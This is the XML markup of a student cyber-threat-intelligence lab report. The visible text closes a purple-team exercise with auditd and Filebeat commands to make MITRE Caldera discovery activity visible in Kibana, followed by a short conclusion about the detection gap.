      <w:r>
        <w:t>The following commands would close the detection gap and make T1033/T1087 visible in Kibana:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF75CC" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo apt install auditd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E6F02B" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo auditctl -a always,exit -F arch=b64 -S execve -k process_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74989263" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo filebeat modules enable auditd &amp;&amp; sudo filebeat setup --pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34C7F8" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo systemctl restart filebeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE82D11" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>After applying the above, the KQL query process.name : "whoami" or auditd.log.key : "process_exec" would return matching events in Kibana Discover, allowing correlation with the Caldera operation timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7915B2F3" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507F02F2" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>This lab successfully demonstrated the end-to-end workflow of automated adversary emulation and SIEM-based detection. MITRE Caldera was deployed as the C2 framework, a Sandcat agent established a trusted HTTP beacon from the victim node, and the Discovery operation executed three MITRE ATT&amp;CK techniques with confirmed output. The ELK Stack was fully deployed and operational.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A0E2B2" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The detection gap identified — absence of auditd process monitoring — is a realistic and common finding in production SOC environments. Documenting and remediating such gaps is a core deliverable of purple team exercises. Enabling auditd with execve rules and the Filebeat auditd module would make all executed TTPs fully detectable in Kibana, closing the gap between red team activity and blue team visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2585E7" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>End of Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408ED472" w14:textId="423BC99F" w:rsidR="008829F9" w:rsidRDefault="008829F9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44229F10" w14:textId="68B7F8E9" w:rsidR="008829F9" w:rsidRDefault="008829F9"/>
    <w:sectPr w:rsidR="008829F9" w:rsidSect="00894116">
      <w:headerReference w:type="default" r:id="rId22"/>
      <w:footerReference w:type="default" r:id="rId2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F3896" w14:textId="77777777" w:rsidR="006C0507" w:rsidRDefault="006C0507" w:rsidP="009A2D5C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02F9A702" w14:textId="77777777" w:rsidR="006C0507" w:rsidRDefault="006C0507" w:rsidP="009A2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7E7F" w14:textId="2888D724" w:rsidR="009A2D5C" w:rsidRPr="009A2D5C" w:rsidRDefault="009A2D5C" w:rsidP="009A2D5C">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:rPr>
        <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="009A2D5C">
      <w:rPr>
        <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      </w:rPr>
      <w:t>ULIYA FATIMA | 232098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DA15" w14:textId="77777777" w:rsidR="006C0507" w:rsidRDefault="006C0507" w:rsidP="009A2D5C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0834EB15" w14:textId="77777777" w:rsidR="006C0507" w:rsidRDefault="006C0507" w:rsidP="009A2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E4DE" w14:textId="1CA7DDEE" w:rsidR="009A2D5C" w:rsidRPr="009A2D5C" w:rsidRDefault="009A2D5C" w:rsidP="009A2D5C">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:rPr>
        <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="009A2D5C">
      <w:rPr>
        <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      </w:rPr>
      <w:t>LAB 7 &amp; 8 | CTI LAB</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="48F148C1" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D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04E9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AE0D0CA"/>
    <w:lvl w:ilvl="0" w:tplc="700CD8F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="10921078">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="33A8FB4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E474B730">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="58EA8A12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3C285C9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FDD0E0C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E19A845E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7A1AC386">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7AFE470C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2F2858A"/>
    <w:lvl w:ilvl="0" w:tplc="A5AE8F5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9B3836C4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7CB0E7F4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FFAE7696">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D9423F0C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0A0814CE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7FEE73C2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5456E418">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="18B098A8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="352152324">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1617366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E07"/>
    <w:rsid w:val="0008722F"/>
    <w:rsid w:val="00095C6E"/>
    <w:rsid w:val="006A6E07"/>
    <w:rsid w:val="006C0507"/>
    <w:rsid w:val="008829F9"/>
    <w:rsid w:val="00894116"/>
    <w:rsid w:val="009A2D5C"/>
    <w:rsid w:val="00B77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39CA"/>
  <w15:docId w15:val="{E12C6232-0257-4D76-B56B-B268E80C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00000"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="6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2D5C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009A2D5C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009A2D5C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009A2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uliya fatima</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-07T17:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-08T11:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>